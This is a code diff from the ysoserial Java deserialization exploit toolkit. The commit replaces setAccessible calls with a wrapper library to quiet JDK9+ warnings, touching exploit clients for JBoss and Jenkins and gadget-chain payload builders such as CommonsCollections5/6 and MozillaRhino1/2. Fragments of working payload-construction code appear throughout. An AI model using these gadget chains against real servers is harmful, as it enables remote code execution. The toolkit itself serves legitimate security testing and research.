quiet jigsaw warnings

pom.xml

@@ -121,6 +121,11 @@
 			<artifactId>javassist</artifactId>
 			<version>3.19.0-GA</version>
 		</dependency>
+		<dependency>
+			<groupId>com.nqzero</groupId>
+			<artifactId>permit-reflect</artifactId>
+			<version>0.3</version>
+		</dependency>
 		<dependency>
 			<groupId>commons-codec</groupId>
 			<artifactId>commons-codec</artifactId>

src/main/java/ysoserial/exploit/JBoss.java

@@ -64,6 +64,7 @@
 import org.xnio.ssl.XnioSsl;
 
 import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.util.Reflections;
 
 
 /**
@@ -272,7 +273,7 @@ private static VersionedConnection makeVersionedConnection ( Channel c )
         VersionedConnection vc;
         Class<?> vcf = Class.forName("org.jboss.remotingjmx.VersionedConectionFactory");
         Method vcCreate = vcf.getDeclaredMethod("createVersionedConnection", Channel.class, Map.class, JMXServiceURL.class);
-        vcCreate.setAccessible(true);
+        Reflections.setAccessible(vcCreate);
         vc = (VersionedConnection) vcCreate.invoke(null, c, new HashMap(), new JMXServiceURL("service:jmx:remoting-jmx://"));
         return vc;
     }

src/main/java/ysoserial/exploit/JenkinsCLI.java

@@ -24,6 +24,7 @@
 import hudson.remoting.Channel.Mode;
 import hudson.remoting.ChannelBuilder;
 import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.util.Reflections;
 
 /**
  * Jenkins CLI client
@@ -73,7 +74,7 @@ public static final void main ( final String[] args ) {
             throws ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
         Class<?> reqClass = Class.forName("hudson.remoting.RemoteInvocationHandler$RPCRequest");
         Constructor<?> reqCons = reqClass.getDeclaredConstructor(int.class, Method.class, Object[].class);
-        reqCons.setAccessible(true);
+        Reflections.setAccessible(reqCons);
         Object getJarLoader = reqCons
                 .newInstance(1, Class.forName("hudson.remoting.IChannel").getMethod("getProperty", Object.class), new Object[] {
                     prop

src/main/java/ysoserial/exploit/JenkinsListener.java

@@ -117,7 +117,7 @@ public static final void main ( final String[] args ) {
     private static Object makeIsPresentOnRemoteCallable ( int oid, Object uro, Class<?> reqClass )
             throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, ClassNotFoundException {
         Constructor<?> reqCons = reqClass.getDeclaredConstructor(int.class, Method.class, Object[].class);
-        reqCons.setAccessible(true);
+        Reflections.setAccessible(reqCons);
         return reqCons
                 .newInstance(oid, JarLoader.class.getMethod("isPresentOnRemote", Class.forName("hudson.remoting.Checksum")), new Object[] {
                     uro,

src/main/java/ysoserial/payloads/CommonsCollections5.java

@@ -81,7 +81,7 @@ public BadAttributeValueExpException getObject(final String command) throws Exce
 
 		BadAttributeValueExpException val = new BadAttributeValueExpException(null);
 		Field valfield = val.getClass().getDeclaredField("val");
-		valfield.setAccessible(true);
+        Reflections.setAccessible(valfield);
 		valfield.set(val, entry);
 
 		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

src/main/java/ysoserial/payloads/CommonsCollections6.java

@@ -9,6 +9,7 @@
 import ysoserial.payloads.annotation.Authors;
 import ysoserial.payloads.annotation.Dependencies;
 import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
 
 import java.io.Serializable;
 import java.lang.reflect.Field;
@@ -70,7 +71,7 @@ public Serializable getObject(final String command) throws Exception {
             f = HashSet.class.getDeclaredField("backingMap");
         }
 
-        f.setAccessible(true);
+        Reflections.setAccessible(f);
         HashMap innimpl = (HashMap) f.get(map);
 
         Field f2 = null;
@@ -80,8 +81,7 @@ public Serializable getObject(final String command) throws Exception {
             f2 = HashMap.class.getDeclaredField("elementData");
         }
 
-
-        f2.setAccessible(true);
+        Reflections.setAccessible(f2);
         Object[] array = (Object[]) f2.get(innimpl);
 
         Object node = array[0];
@@ -96,7 +96,7 @@ public Serializable getObject(final String command) throws Exception {
             keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
         }
 
-        keyField.setAccessible(true);
+        Reflections.setAccessible(keyField);
         keyField.set(node, entry);
 
         return map;

src/main/java/ysoserial/payloads/Hibernate1.java

@@ -78,7 +78,7 @@ public static Object makeHibernate4Getter ( Class<?> tplClass, String method ) t
         Class<?> getterIf = Class.forName("org.hibernate.property.Getter");
         Class<?> basicGetter = Class.forName("org.hibernate.property.BasicPropertyAccessor$BasicGetter");
         Constructor<?> bgCon = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class);
-        bgCon.setAccessible(true);
+        Reflections.setAccessible(bgCon);
 
         if ( !method.startsWith("get") ) {
             throw new IllegalArgumentException("Hibernate4 can only call getters");

src/main/java/ysoserial/payloads/JBossInterceptors1.java

@@ -20,6 +20,7 @@
 import ysoserial.payloads.util.Gadgets;
 import ysoserial.payloads.util.JavaVersion;
 import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
 
 import java.lang.reflect.Constructor;
 import java.util.*;
@@ -50,7 +51,7 @@ public Object getObject(final String command) throws Exception {
         s.add(org.jboss.interceptor.spi.model.InterceptionType.POST_ACTIVATE);
 
         Constructor defaultMethodMetadataConstructor = DefaultMethodMetadata.class.getDeclaredConstructor(Set.class, MethodReference.class);
-        defaultMethodMetadataConstructor.setAccessible(true);
+        Reflections.setAccessible(defaultMethodMetadataConstructor);
         MethodMetadata methodMetadata = (MethodMetadata) defaultMethodMetadataConstructor.newInstance(s,
                 MethodReference.of(TemplatesImpl.class.getMethod("newTransformer"), true));
 

src/main/java/ysoserial/payloads/JavassistWeld1.java

@@ -20,6 +20,7 @@
 import ysoserial.payloads.util.Gadgets;
 import ysoserial.payloads.util.JavaVersion;
 import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
 
 import java.lang.reflect.Constructor;
 import java.util.*;
@@ -50,7 +51,7 @@ public Object getObject(final String command) throws Exception {
         s.add(org.jboss.weld.interceptor.spi.model.InterceptionType.POST_ACTIVATE);
 
         Constructor defaultMethodMetadataConstructor = DefaultMethodMetadata.class.getDeclaredConstructor(Set.class, MethodReference.class);
-        defaultMethodMetadataConstructor.setAccessible(true);
+        Reflections.setAccessible(defaultMethodMetadataConstructor);
         MethodMetadata methodMetadata = (MethodMetadata) defaultMethodMetadataConstructor.newInstance(s,
                 MethodReference.of(TemplatesImpl.class.getMethod("newTransformer"), true));
 

src/main/java/ysoserial/payloads/MozillaRhino1.java

@@ -8,6 +8,7 @@
 import ysoserial.payloads.util.Gadgets;
 import ysoserial.payloads.util.JavaVersion;
 import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
 
 import javax.management.BadAttributeValueExpException;
 import java.lang.reflect.Constructor;
@@ -27,7 +28,7 @@ public Object getObject(final String command) throws Exception {
 
         Class nativeErrorClass = Class.forName("org.mozilla.javascript.NativeError");
         Constructor nativeErrorConstructor = nativeErrorClass.getDeclaredConstructor();
-        nativeErrorConstructor.setAccessible(true);
+        Reflections.setAccessible(nativeErrorConstructor);
         IdScriptableObject idScriptableObject = (IdScriptableObject) nativeErrorConstructor.newInstance();
 
         Context context = Context.enter();
@@ -43,14 +44,14 @@ public Object getObject(final String command) throws Exception {
         idScriptableObject.setGetterOrSetter("message", 0, nativeJavaMethod, false);
 
         Method getSlot = ScriptableObject.class.getDeclaredMethod("getSlot", String.class, int.class, int.class);
-        getSlot.setAccessible(true);
+        Reflections.setAccessible(getSlot);
         Object slot = getSlot.invoke(idScriptableObject, "name", 0, 1);
         Field getter = slot.getClass().getDeclaredField("getter");
-        getter.setAccessible(true);
+        Reflections.setAccessible(getter);
 
         Class memberboxClass = Class.forName("org.mozilla.javascript.MemberBox");
         Constructor memberboxClassConstructor = memberboxClass.getDeclaredConstructor(Method.class);
-        memberboxClassConstructor.setAccessible(true);
+        Reflections.setAccessible(memberboxClassConstructor);
         Object memberboxes = memberboxClassConstructor.newInstance(enterMethod);
         getter.set(slot, memberboxes);
 
@@ -59,7 +60,7 @@ public Object getObject(final String command) throws Exception {
 
         BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
         Field valField = badAttributeValueExpException.getClass().getDeclaredField("val");
-        valField.setAccessible(true);
+        Reflections.setAccessible(valField);
         valField.set(badAttributeValueExpException, idScriptableObject);
 
         return badAttributeValueExpException;

src/main/java/ysoserial/payloads/MozillaRhino2.java

@@ -65,7 +65,7 @@ public Object getObject( String command) throws Exception {
 
         ScriptableObject initContextScriptableObject = new Environment();
         Method makeSlot = ScriptableObject.class.getDeclaredMethod("accessSlot", String.class, int.class, int.class);
-        makeSlot.setAccessible(true);
+        Reflections.setAccessible(makeSlot);
         Object slot = makeSlot.invoke(initContextScriptableObject, "foo", 0, 4);
         Reflections.setFieldValue(slot, "getter", initContextMemberBox);
 

src/main/java/ysoserial/payloads/util/Gadgets.java

@@ -12,6 +12,7 @@
 import java.util.HashMap;
 import java.util.Map;
 
+import com.nqzero.permit.Permit;
 import javassist.ClassClassPath;
 import javassist.ClassPool;
 import javassist.CtClass;
@@ -148,7 +149,7 @@ public static HashMap makeMap ( Object v1, Object v2 ) throws Exception, ClassNo
             nodeC = Class.forName("java.util.HashMap$Entry");
         }
         Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
-        nodeCons.setAccessible(true);
+        Reflections.setAccessible(nodeCons);
 
         Object tbl = Array.newInstance(nodeC, 2);
         Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));

src/main/java/ysoserial/payloads/util/Reflections.java

@@ -1,19 +1,27 @@
 package ysoserial.payloads.util;
 
+import java.lang.reflect.AccessibleObject;
 import java.lang.reflect.Constructor;
 import java.lang.reflect.Field;
 import java.lang.reflect.InvocationTargetException;
 
 import sun.reflect.ReflectionFactory;
 
+import com.nqzero.permit.Permit;
+
 @SuppressWarnings ( "restriction" )
 public class Reflections {
 
+    public static void setAccessible(AccessibleObject member) {
+        // quiet runtime warnings from JDK9+
+        Permit.setAccessible(member);
+    }
+
 	public static Field getField(final Class<?> clazz, final String fieldName) {
         Field field = null;
-	    try {
-	        field = clazz.getDeclaredField(fieldName);
-            field.setAccessible(true);
+	try {
+	    field = clazz.getDeclaredField(fieldName);
+	    setAccessible(field);
         }
         catch (NoSuchFieldException ex) {
             if (clazz.getSuperclass() != null)
@@ -34,7 +42,7 @@ public static Object getFieldValue(final Object obj, final String fieldName) thr
 
 	public static Constructor<?> getFirstCtor(final String name) throws Exception {
 		final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
-	    ctor.setAccessible(true);
+	    setAccessible(ctor);
 	    return ctor;
 	}
 
@@ -51,9 +59,9 @@ public static <T> T createWithoutConstructor ( Class<T> classToInstantiate )
     public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs )
             throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
         Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
-        objCons.setAccessible(true);
+	    setAccessible(objCons);
         Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
-        sc.setAccessible(true);
+	    setAccessible(sc);
         return (T)sc.newInstance(consArgs);
     }
 

src/test/java/ysoserial/test/payloads/MyfacesTest.java

@@ -23,6 +23,7 @@
 import org.mockito.invocation.InvocationOnMock;
 import org.mockito.stubbing.Answer;
 
+import ysoserial.payloads.util.Reflections;
 import ysoserial.test.CustomDeserializer;
 import ysoserial.Deserializer;
 
@@ -142,7 +143,7 @@ public MyfacesDeserializer ( byte[] bytes ) {
         @Override
         public Object call () throws Exception {
             java.lang.reflect.Method setFC = FacesContext.class.getDeclaredMethod("setCurrentInstance", FacesContext.class);
-            setFC.setAccessible(true);
+            Reflections.setAccessible(setFC);
             ClassLoader oldTCCL = Thread.currentThread().getContextClassLoader();
             Thread.currentThread().setContextClassLoader(this.getClass().getClassLoader());
             FacesContext ctx = createMockFacesContext();